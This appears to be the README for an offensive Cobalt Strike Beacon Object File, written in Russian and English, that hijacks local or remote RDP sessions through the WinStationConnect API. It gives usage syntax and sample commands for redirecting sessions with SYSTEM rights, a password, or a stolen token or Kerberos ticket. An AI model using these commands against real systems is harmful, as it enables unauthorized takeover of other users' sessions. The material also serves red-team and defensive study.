
Файл объекта Beacon (BOF) для Cobalt Strike, использующий API WinStationConnect для выполнения локального/удаленного перехвата сеансов RDP.
Cobalt Strike Beacon Object File (BOF), использующий API WinStationConnect для выполнения локального/удаленного перехвата RDP-сессий. При наличии валидного токена доступа / билета Kerberos (например, golden ticket) владельца сессии, вы сможете перехватить сессию удаленно, не устанавливая бекон/инструмент на целевой сервер.
Для перечисления сессий локально/удаленно можно использовать Quser-BOF.

Usage: bof-rdphijack [your console session id] [target session id to hijack] [password|server] [argument]
Command Description
-------- -----------
password Specifies the password of the user who owns the session to which you want to connect.
server Specifies the remote server that you want to perform RDP hijacking.
Sample usage
--------
Redirect session 2 to session 1 (require SYSTEM privilege):
bof-rdphijack 1 2
Redirect session 2 to session 1 with password of the user who owns the session 2 (require high integrity beacon):
bof-rdphijack 1 2 password P@ssw0rd123
Redirect session 2 to session 1 for a remote server (require token/ticket of the user who owns the session 2):
bof-rdphijack 1 2 server SQL01.lab.internal
make
tscon.exe